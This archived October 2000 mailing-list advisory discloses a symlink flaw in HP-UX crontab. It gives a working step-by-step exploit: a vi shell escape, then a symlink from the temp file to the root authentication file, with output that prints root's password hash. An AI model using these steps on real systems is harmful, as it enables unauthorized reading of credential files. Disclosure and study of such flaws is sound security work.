|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: [ Hackerslab bug_paper ] HP-UX crontab temporary file symbolic link vulnerability
From: Kyong-won Cho (dubhe
HACKERSLAB.COM)Date: Fri Oct 20 2000 - 22:08:20 CDT
- Next message: Iván Arce: "[CORE SDI ADVISORY] MySQL weak authentication"
- Previous message: bugzillaREDHAT.COM: "[RHSA-2000:086-05] ypbind for Red Hat Linux 5.x, 6.x has a local root exploit"
- Next in thread: Sergey Nenashev: "Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability"
- Reply: Sergey Nenashev: "Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
============================================================================
====
[ Hackerslab bug_paper ] HP-UX crontab temporary file symbolic link
vulnerability
============================================================================
====
File : /usr/bin/crontab
SYSTEM : HP-UX
Tested in HP-UX 11.00
INFO :
There is a vulneribility in "crontab" which allows users to read all files
without attaining root or file ownership privileges.
The "crontab" command can't be run by any user in general however, users
that are registered in crontab.allow are permitted to run the command.
Using the crontab command with the -e option (crontab -e) excutes vi editor
and a temporary file is created in /var/tmp/ . The owner of the file is a
current user.
Make a subshell by using !sh command in vi and link the file created in
/var/tmp/ then exit crontab. Then the error message appears with all the
file names and details.
Example) display the contents of /tcb/files/auth/r/root
$ id
uid=101(dubhe) gid=101(swat)
$uname -s -r
HP-UX B.11.00
$ crontab -e
...
...
~
"/var/tmp/aaaa25923"
### A file named /var/tmp/aaaa25923 is created
~
:!sh
### Make a subshell
$ ln -sf /tcb/files/auth/r/root /var/tmp/aaaa25923
$ exit
### Make symlink and return vi
[Hit return to continue]
:q!
### Quit vi
root:u_name=root:u_id#0:\
crontab: error on previous line; unexpected character found in line.
:u_pwd=Of2wgf6SCoIbQ:\
crontab: error on previous line; unexpected character found in line.
:u_bootauth:u_auditid#0:\
crontab: error on previous line; unexpected character found in line.
:u_auditflag#1:\
crontab: error on previous line; unexpected character found in line.
:u_pswduser=root:u_suclog#972084495:u_unsuclog#972084492:u_lock:\
crontab: error on previous line; unexpected character found in line.
:chkent:
crontab: error on previous line; unexpected character found in line.
==--------------------------------------------------------------------------
-----==
********
* ** ** *
* ** ** *
* ****** *
* ** ** *
dubhehackerslab.org [Kyong-won, Cho]
* ** ** * [
http://www.hackerslab.org ]
******** HACKERSLAB (C) since 1999
==--------------------------------------------------------------------------
-----==
- Next message: Iván Arce: "[CORE SDI ADVISORY] MySQL weak authentication"
- Previous message: bugzillaREDHAT.COM: "[RHSA-2000:086-05] ypbind for Red Hat Linux 5.x, 6.x has a local root exploit"
- Next in thread: Sergey Nenashev: "Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability"
- Reply: Sergey Nenashev: "Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]